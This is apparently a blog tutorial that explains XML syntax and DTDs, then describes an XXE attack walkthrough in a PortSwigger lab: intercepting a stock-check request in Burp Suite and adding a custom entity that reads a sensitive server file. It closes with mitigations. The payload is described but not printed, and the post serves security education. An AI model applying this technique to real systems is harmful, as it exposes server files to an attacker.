What is XML?
XML stands for eXtensible Markup Language. XML defines a set of formats that makes a collection of data readable to both machine and human readable. XML has a widespread usage, a ton of document formats have been developed using XML syntax, some examples of which are RSS, Atom and Microsoft office. Even many software development frameworks such as Microsoft .NET uses XML files to properly configure and define application properties
Before diving into the XML Attacks, we need to properly understand several XML Terminologies
Markup and Content
XML Document as a whole is divided into two sections, one is Markup and second one is content. Markup generally begin with special characters \< or & and they end with characters \> or ;. String that are not Markup strings are classified as Content
In the Markup section, any string that begins with \< and ends with \> is called tag.
Just like HTML, in XML, there are both start tags and end tags
A start tag would look like \<name\> and an end-tag would look like \</name\>
A component of the XML document that begins with the start tag and ends with the end tag is the element. Everything between start tag and end tag is called element content.
If an element contains another element, then it is called the parent element of the child element.
\<fname\> Malav \</fname\>
\<lname\> Vyas \</lname\>
Here Employee is the parent element and fname and lname are the child elements
All key and value pairs are considered as an Attribute.
\<Employee branch="New York"\>
Here, branch is the attribute and "New York" is the value of the attribute branch
Document Type Definition (DTD)
A document type definition (DTD) according to wikipedia is a set of markup declarations that define a document type for markup languages such as XML.
That is, DTD defines how elements are to be parsed in a XML file
Consider the following XML file
\<?xml version="1.0" encoding="UTF-8"?\> \<!DOCTYPE University SYSTEM "xxe.dtd"\> \<University\> \<Employee\> \<name\> Bob \</name\> \<salary\> 4000 \</salary\> \</Employee\> \<Student\> \<name\> Marley \</name\> \<grade\> A \</grade\> \</Student\> \</University\>
First line here defines the xml version of the document to 1.0 and encoding to be of UTF-8
As we are definitions defined in a different document, we need to tell the xml parser to include an external document type definition (DTD) file.
After necessary tags out of the way, xml content begins, where the main node is of University which has child nodes of Employee and Student. Same way, Employee contains sub nodes name and salary as Student node contains name and grade.
As we have custom tags used in the document, we need to tell the xml document as what to expect with each of the custom element in the document type definition (DTD) file
Following is the xxe.dtd file.
\<!ELEMENT University (Employee, Student)\>
\<!ELEMENT Employee (name, salary)\>
\<!ELEMENT Student (name, grade)\>
\<!ELEMENT name (#PCDATA)\>
\<!ELEMENT salary (#PCDATA)\>
\<!ELEMENT grade (#PCDATA)\>
Here, \<!ELEMENT\> means we are defining a new element for the xml.
First element we have defined is the University element, which should expect one of each employee and student tag
Second and third line defines Employee and student elements, where employee element expects name and salary elements while student element expects name and grade elements.
Finally we have defined foundational elements, i.e. name, salary and grade.
Here, #PCDATA means parsed character data. I.e. it contains data that is to be parsed directly by the parser
We can run these files to a parser to validate if there are any errors or not.
For the demonstration purposes, we have used xmllint parser
xmllint --valid --noout --loaddtd xxe.xml
Here, --valid means we want to validate our xml file, --noout means no output if success and --loaddtd instructs the parser to load any dtd file if available
XML eXternal Entity attacks, as they are harder to exploit and discover, they are very widespread. This explains why XXE attacks are ranked at 4 on owasp top 10 web vulnerabilities list
For the demonstration purposes, we will be using portswigger web security academy xxe labs
The demo ecommerce website we are presented with, contains xxe vulnerability.
To inspect that, we select any item's details
Turn on burp suite and click on the check stock to inspect the request made by the browser
It should look like following
As we can see in the request, the webpage creates an XML file from the product and store we have selected and sends the xml document to the backend for processing and returning the amount of stock
We can forward it to the repeater for better analysis
Now, in this xml, we can add our custom dtd to define an entity that when call would read a sensitive file
Now after definition, we need to call the entity
We can replace the product id from the xml generated by the webpage and add the payload to call our custom malicious entity with &exp;
We can see the contents of the sensitive file in the output window
Whenever possible, use alternate, less complicated formats such as JSON. All XML pre-processors should be kept up to date with enabled logging
DTD and XML external entity parsing should be disabled in all xml parser applications
Above all, User input should never be supplied directly to any application without proper sanitization.
The awesome image used in this article was created by catalyst .